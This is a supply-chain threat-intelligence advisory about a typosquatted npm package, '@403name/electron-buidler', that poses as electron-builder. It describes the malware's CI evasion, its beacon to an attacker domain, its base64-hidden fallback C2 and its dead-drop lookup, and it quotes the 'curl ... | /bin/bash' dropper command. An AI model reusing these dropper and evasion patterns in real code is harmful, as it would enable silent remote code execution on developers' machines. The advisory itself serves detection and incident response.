THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in @403name/electron-buidler (npm)

@403name/electron-buidler

Risk score

92

AI summary

Indexed incident for @403name/electron-buidler (npm).

Description

On require(), index.js runs an immediately-invoked function expression that gates on platform (macOS only), exits if it detects a CI environment, and writes a one-shot marker file at ~/.cache/.nyx-npm/eb so the routine runs at most once per host. After a random 30-90 second delay it performs two attacker-controlled network operations.

First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname() and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim host to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn the current C2 base URL (the hard-coded fallback, concealed as atob('aHR0cHM6Ly9rN3htOXEueHl6'), decodes to https://k7xm9q.xyz), then runs curl -sSfL <C2>/api/payload/ | /bin/bash through spawn('/bin/sh','-c',...) with & disown so the shell outlives the installing process.

The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package, published under an unrelated scope; the README's 'Electron application builder' claim is cover for the dropper. Importing this package on a non-CI macOS host yields remote code execution as the installing user, with a payload the attacker can swap at any time and no user interaction of any kind.

Because of the CI check, the delay and the run-once marker, a sandboxed or CI install may show no network activity at all. Triage should read index.js directly rather than rely on dynamic observation, and hosts should be checked for the marker file and for outbound connections to k7xm9q.xyz.

Technical details

Affected versions

  • = 1.0.1
  • = 1.0.0

Indicators

  • affected version = 1.0.1 (75%)
  • affected version = 1.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents